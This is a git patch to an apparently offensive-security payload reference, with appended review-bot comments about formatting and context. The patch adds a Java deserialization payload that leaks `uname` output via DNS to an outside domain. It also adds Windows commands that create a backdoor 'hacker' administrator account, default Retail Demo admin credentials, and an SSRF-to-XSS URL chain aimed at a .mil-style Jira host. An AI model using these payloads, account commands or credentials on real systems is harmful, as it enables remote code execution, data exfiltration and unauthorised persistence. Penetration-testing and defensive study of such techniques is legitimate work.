From 4ad7c70e89cbf0e6689940c810409049edec7a59 Mon Sep 17 00:00:00 2001 From: Swissky Date: Wed, 6 Jun 2018 00:05:28 +0200 Subject: [PATCH] SSRF to XSS + Retail account Windows --- Java Deserialization/README.md | 1 + .../Windows - Using credentials.md | 10 +++++++++- SSRF injection/README.md | 11 +++++++++++ 3 files changed, 21 insertions(+), 1 deletion(-) diff --git a/Java Deserialization/README.md b/Java Deserialization/README.md index 6010ea5..b5070ab 100644 --- a/Java Deserialization/README.md +++ b/Java Deserialization/README.md @@ -6,6 +6,7 @@ java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin +java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 ``` payload | author | dependencies | impact (if not RCE) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 6658cb3..2809511 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -1,5 +1,6 @@ # Windows - Using credentials -Little tip, if you don't have credentials yet :D + +## TIP 1 - Create your credential :D ```powershell net user hacker hacker /add net localgroup administrators hacker /add @@ -10,6 +11,13 @@ net user /dom net user /domain ``` +## TIP 2 - Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289) +when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin +```powershell +Username: RetailAdmin +Password: trs10 +``` + ## Metasploit - SMB ```c diff --git a/SSRF injection/README.md b/SSRF injection/README.md index b3fb0bd..0399cf4 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md 
@@ -194,6 +194,15 @@ Content of evil.com/redirect.php: ?> ``` +## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) +```bash +http://brutelogic.com.br/poc.svg -> simple alert +https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf + +https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg +``` + + ## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories) Interesting path to look for at http://169.254.169.254 @@ -335,3 +344,5 @@ http://100.100.100.200/latest/meta-data/image-id * [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow) * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/) * [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51) +* [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) +* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a) \ No newline at end of file
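Review bot: The new `Jdk7u21` line in `Java Deserialization/README.md` (hunk `@@ -6,6 +6,7 @@`) is the only entry in that block that pipes through `gzip | base64` and the only one with a `[redacted]` token, and neither is explained. A one-line comment above it stating that `[redacted]` stands for the tester's own DNS-logging domain and that the gzip/base64 step is for a specific transport (otherwise the reader will copy it as-is and get a base64 blob where a raw `.bin` is expected) would bring it in line with the other three entries, which all write plain `payload.bin` files.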
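Review bot: Hunk `@@ -1,5 +1,6 @@` of `Windows - Using credentials.md` drops the only sentence that gave the `net user hacker hacker /add` block its context ("if you don't have credentials yet") and replaces it with the heading `## TIP 1 - Create your credential :D`. The heading should keep that precondition, and it reads better as "Create your own credentials"; suggest `## TIP 1 - Create your own credentials (requires local admin) :D`. It is also worth a sentence that this is the noisiest option in the file: local account creation and addition to `administrators` are logged as Security events 4720 and 4732, so a reader doing an authorised assessment should expect it to be picked up.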
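Review bot: In hunk `@@ -10,6 +11,13 @@` the `Username: RetailAdmin` / `Password: trs10` block is fenced as `powershell` but contains no PowerShell, just two labelled values; the fence should be untagged or tagged `text` so it is not mistaken for a runnable command. The intro sentence `when you run Windows in retail demo mode, ...` needs a capital and should name the feature precisely: these accounts only exist on a device that has been left in the Retail Demo Experience mode used on shop-floor demo units, which is never a production configuration, so the practical takeaway for a defender is that any such device should have demo mode removed and be reimaged before it is joined to a real network.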
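Review bot: The `SSRF to XSS` block in hunk `@@ -194,6 +194,15 @@` of `SSRF injection/README.md` is fenced as `bash`, but its three lines are URLs with `-> simple alert` / `-> simple ssrf` annotations, and `->` is a redirection in shell syntax; use a plain or `text` fence. The section also does not say why fetching an SVG through the `icon-uri?consumerUri=` endpoint turns an SSRF into XSS: add one sentence stating the mechanism from the linked write-up (the server returns the fetched body to the browser, so script inside the SVG runs in the vulnerable site's origin), since that is the whole point of the entry and is what a reader would need to recognise the same pattern elsewhere. Finally, `https://website.mil/...` looks like a real host; the rest of the file uses neutral placeholders, so `https://example.com/...` would be consistent. There is a double blank line after the closing fence that can be collapsed.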
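Review bot: The two new references in hunk `@@ -335,3 +344,5 @@` omit the author handle that every neighbouring entry carries (`- @EdOverflow`, `- @sxcurity`, `@secjuice`); the first should end with `- @D0rkerDevil` to match, and `xss` / `ssrf` in its title should be capitalised like the heading added earlier in the same file. The hunk also introduces `\ No newline at end of file`; add the trailing newline so the next addition to the list does not produce a spurious one-line diff.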